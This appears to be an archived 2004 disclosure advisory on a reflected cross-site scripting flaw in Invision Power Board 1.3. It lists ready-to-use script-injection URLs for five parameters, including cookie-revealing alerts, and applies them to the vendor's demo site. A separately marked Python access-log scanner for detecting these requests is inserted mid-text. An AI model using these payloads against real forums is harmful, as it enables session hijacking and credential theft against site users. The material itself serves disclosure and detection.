
invision13.txt
Posted Mar 5, 2004
Authored by Rafel Ivgi | Site theinsider.deep-ice.com

Invision Power Board version 1.3 Final is susceptible to a cross site scripting attack.

tags | exploit, xss
SHA-256 | 93d8939b30b06bd6edcf59474442458101779057deb1b80413667302d3c4d1bf

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Software: Invision Power Board
Vendor: http://www.invisionboard.com/
Versions: (U) v1.3 Final
Bug: Cross Site Scripting Vulnerability
Risk: Medium
Exploitation: Remote with browser
Date: 29 Feb 2004
Author: Rafel Ivgi, The-Insider
E-Mail: the_insider@mail.com
Web: http://theinsider.deep-ice.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bug
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

Invision Power Board is available under a yearly and lifetime purchase
option for both personal and commercial use, no catches, no "spyware",
no hidden costs anywhere.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

The vulnerability is Cross Site Scripting.
The vulnerable form fields are "c","f","showtopic","showuser","username".
If an attacker requests one of the following URLs from the server:

http://<host>/?c='><script>alert(window.document.url)</script><plaintext>
Or
http://<host>/?showtopic='><script>alert(window.document.url)</script><plaintext>
Or
http://<host>/?act=SR&f='><script>alert(document.cookie)</script>
Or
http://<host>/?showuser='><script>alert(document.cookie)</script>
Or
http://<host>/index.php?act=Reg&CODE=2&coppa_user=0&UserName='><script>alert(document.cookie)</script>


XSS occurs and the server allows an attacker to inject and execute scripts.
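
A defender can look for requests of this shape in web server logs. The following is an added example, not part of the original advisory or of Invision Power Board: it scans access-log lines for the parameters listed above and flags values that do not fit. Treating "c", "f", "showtopic" and "showuser" as numeric IDs is an assumption, and the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters named in the advisory. Treating the first four as numeric IDs
# is an assumption about the board's URL scheme, not a statement from the page.
NUMERIC_PARAMS = {"c", "f", "showtopic", "showuser"}
# The advisory lists "username"; its URLs use "UserName". Names are lowercased.
TEXT_PARAMS = {"username"}
HTML_META = re.compile(r"[<>'\"]")
DIGITS = re.compile(r"[0-9]+")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(request_target):
    """Return (name, decoded value) pairs whose value does not fit the parameter."""
    hits = []
    # parse_qsl percent-decodes, so %27%3E is compared as '> here.
    for name, value in parse_qsl(urlsplit(request_target).query):
        key = name.lower()
        if key in NUMERIC_PARAMS and not DIGITS.fullmatch(value):
            hits.append((name, value))
        elif key in TEXT_PARAMS and HTML_META.search(value):
            hits.append((name, value))
    return hits

def scan(lines):
    """Return (line number, parameter, decoded value) for every flagged request."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            for name, value in suspicious_params(match.group(1)):
                findings.append((lineno, name, value))
    return findings

# Constructed access-log lines (documentation addresses), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Mar/2004:10:00:01 +0000] "GET /index.php?showtopic=1234 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [05/Mar/2004:10:00:07 +0000] "GET /?showuser=%27%3E%3Cscript%3E HTTP/1.1" 200 4301',
    '192.0.2.12 - - [05/Mar/2004:10:00:09 +0000] "GET /index.php?act=Reg&CODE=2&coppa_user=0&UserName=%27%3E%3Cb%3E HTTP/1.1" 200 3999',
    '192.0.2.13 - - [05/Mar/2004:10:00:12 +0000] "GET /index.php?act=SR&f=7 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for lineno, name, value in scan(SAMPLE_LOG):
        print(f"line {lineno}: {name}={value!r}")
```

The same allow-list idea applies server-side: rejecting non-numeric IDs and HTML-escaping the user name before output removes the reflection.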


In the words of securityfocus.com:
~~~~~~~~~~~~~~~~~~~~~~~~~~

If all of these circumstances are met, an attacker may be able to exploit
this issue via a malicious link containing arbitrary HTML and script code
as part of the hostname. When the malicious link is clicked by an
unsuspecting user, the attacker-supplied HTML and script code will be
executed by their web client. This will occur because the server will echo
back the malicious hostname supplied in the client's request, without
sufficiently escaping HTML and script code.

Attacks of this nature may make it possible for attackers to manipulate web
content or to steal cookie-based authentication credentials. It may be
possible to take arbitrary actions as the victim user.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

http://<host>/?c='><script>alert(window.document.url)</script><plaintext>
http://<host>/?showtopic='><script>alert(window.document.url)</script><plaintext>
http://<host>/?act=SR&f='><script>alert(document.cookie)</script>
http://<host>/?showuser='><script>alert(document.cookie)</script>
http://<host>/index.php?act=Reg&CODE=2&coppa_user=0&UserName='><script>alert(document.cookie)</script>

Live Example:
http://demo.invisionboard.com/?c='><script>alert(window.document.url)</script><plaintext>
http://demo.invisionboard.com/?showtopic='><script>alert(window.document.url)</script><plaintext>
http://demo.invisionboard.com/?act=SR&f='><script>alert(document.cookie)</script>
http://demo.invisionboard.com/?showuser='><script>alert(document.cookie)</script>
http://demo.invisionboard.com/index.php?act=Reg&CODE=2&coppa_user=0&UserName='><script>alert(document.cookie)</script>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

---
Rafel Ivgi, The-Insider - advisory#41.txt
http://theinsider.deep-ice.com

"Things that are unlikeable, are NOT impossible."